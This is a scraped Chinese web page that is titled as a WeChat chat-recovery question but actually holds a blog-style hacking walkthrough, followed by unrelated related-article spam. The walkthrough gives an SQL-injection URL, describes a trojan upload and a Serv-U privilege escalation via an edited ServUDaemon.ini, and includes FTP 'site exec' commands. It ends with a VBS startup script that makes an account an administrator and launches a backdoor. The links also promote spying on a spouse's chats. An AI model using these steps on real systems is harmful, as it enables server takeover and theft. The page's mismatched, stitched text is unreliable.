请问已删除的微信聊天记录可以找回吗 有什么办

访客4年前黑客工具1162

前几天听一树说了惊云下载系统的漏洞 问题文件出在admin/user.asp 提交 http://www.xxx.com/down/admin/user.asp?user=admin’andasc(mid(pwd,1,1))>37and’1’=’1 就相当于: select*fromUserInfowhereuser=’admin’andasc(mid(pwd,1,1))>37and’1’=’1’" 利用access注入得到管理员密码 上面有一个文件upfile.htm 手工利用了下动网的upfile.asp漏洞 就成功上传了个asp木马 然后那个虚拟主机的c,d盘是NTFS分区 不能访问E盘装着servu,php,webmail, F盘是虚拟站点 servu安装目录可写~ 本来打算替换他servu文件的~但是觉的太麻烦 还容易让管理员怀疑 想起servu的本地提升来了 在自己计算机上装了个servu 添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里看ServUDaemon.ini 格式是这样的 [GLOBAL] Version=5.0.0.11 LocalSetupPassword=072C63105200180D5C07170A7E3E LocalSetupPortNo=60628 ProcessID=972 [DOMAINS] Domain1=192.168.0.102||21|向导产生域|1|0|0 Domain2=192.168.0.102||2121|123|2|0|0 [Domain1] User1=www|1|0 [USER=www|1] Password=ih0C292E1AC82920B7F384007F302A1296 HomeDir=D:\xiaoben TimeOut=600 Note1="Wizardgeneratedaccount" Access1=D:\xiaoben|RLPWAMCD SKEYValues= [Domain2] User1=rover|1|0 User2=123|1|0 [USER=rover|2] Password=dx5D12C060F16C7166779414FA038E881D HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP SKEYValues= [USER=123|2] Password=kv3F6EED70340AD1478ADF95963A07FD00 HomeDir=c:\ TimeOut=600 Access1=C:\|RWAMLCDP SKEYValues= ---------------- 其中rover用户就是我添加的那个 在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini 访照我本地的INI写进一个用户进去 User1=rover|1|0 [USER=rover|2] Password=dx5D12C060F16C7166779414FA038E881D HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP SKEYValues= 保存~ 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>openip Connectedtoip. 220Serv-UFTPServerv5.0.0.4forWinSockready... User(ip:(none)):id//输入构造的用户 331Usernameokay,pleasesendcompleteE-mailaddressaspassword. Password:password//密码 230Userloggedin,proceed. ftp>cdwinnt//进入win2k的winnt目录,如果是winxp或者是windowsserver2003就应该为windows目录。 250Directorychangedto/WINNT ftp>cdsystem32//进入system32目录 250Directorychangedto/WINNT/system32 ftp>quotesiteexecnet.exeuserroverrover1234/add//利用系统的net.exe文件加用户。 提示没有权限~郁闷~ 但是我们有对C盘的访问权限了是不~hoho~ 把后门(server.exe)传他system32目录 然后写一个VBs教本 setwshshell=createobject("wscript.shell") a=wshshell.run("cmd.exe/cnetusertsinternetuserrover1234/add",0) b=wshshell.run("cmd.exe/cnetlocalgroupAdministratorstsinternetuser/add",0) b=wshshell.run("cmd.exe/cnetusertsinternetuser/active:yes",0) b=wshshell.run("cmd.exe/cserver.exe",0) 存为HELP.vbe 这个教本的作用是修改tsinternetuser用户密码为rover1234 并且提升为管理员 然后执行system32目录下的server.exe 把这个教本传他C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动 目录 这样管理员只要一登陆就会执行那个教本~ 接下来就是等了~ 等他登陆~ 等了一段时间(看了一部蜘蛛侠的时间吧)~ 连接后门~得到admin权限的shell hoho~ 接下来是善后工作了~就不说了 今天心情非常糟~有一些事情压的我喘不过气来 考试的时候当老师面把卷子撕了,然后扬步走了~ 妈妈的~过程写的很乱~见谅

相关文章

张亮麻辣烫总部加盟费要多少钱?意想不到的优惠

张亮麻辣烫总部加盟费要多少钱?意想不到的优惠

此刻人们的糊口程度提高了,所以对付营养的食物也是追求各人更多了,而麻辣烫是受到消费者的喜爱的,而个中的张亮麻辣烫加盟更是迎和了当下消费者的美食需求,所以可以或许有更好的成长。张亮麻辣烫加盟为各人提供营...

微信怎么让两个人收到:微信可以两个人同时登录吗

微信可以同步接收消息 设置步骤如下: 1.在您的手机上打开微信并登录,然后微信小红的“设置”选项如下所示,并查找“我的帐户” 2.点击“QQ号码”在我的帐户窗口,然后按照页面提示输入QQ号码和其...

国内有钱人雇佣黑客(最有钱的黑客)

国内有钱人雇佣黑客(最有钱的黑客)

本文目录一览: 1、通过网络揭密黑客如何赚钱? 2、黑客是怎么赚钱的?一年能赚多少? 3、有人雇电脑黑客入侵我朋友的电脑,怎么解决?或者相关法律有保护我朋友不? 4、真的有很贫穷又厉害的个...

微信聊天记录几个月自动删除「微信聊天记录怎么恢复?」

  我们每天都在使用微信聊天,很多时间为了方便加入了一些群,也就会产生很多的聊天记录,比如文字、语音、图片和视频,但我们的手机内存是有限的,到一定的程度后就必须要删除一些信息,但也会出现微信聊天记录会...

微信聊天记录怎么查询,我想查我老公的,他删除了能恢复吗

微信聊天记录怎么查询,我想查我老公的,他删除了能恢复吗 人类已经迅速迈向领先的互联网时代,无线网络覆盖现代人的每个生活角落。无论是家庭、工作、学习、还是约会我们都能轻松连接附近wifi热点。...

雪洛可加盟要了解什么(加盟雪洛可靠谱吗)

雪洛可加盟要了解什么(加盟雪洛可靠谱吗)

随着冰淇淋的多元化发展,它从季节性的食物变成了四季皆宜的美食,投身于冰淇淋行业的投资者也越来越多。现在冰淇淋加盟店也逐渐发展成为了多元化的美食店,雪洛可冰淇淋就是其中一个值得关注的投资项目,其发展前景...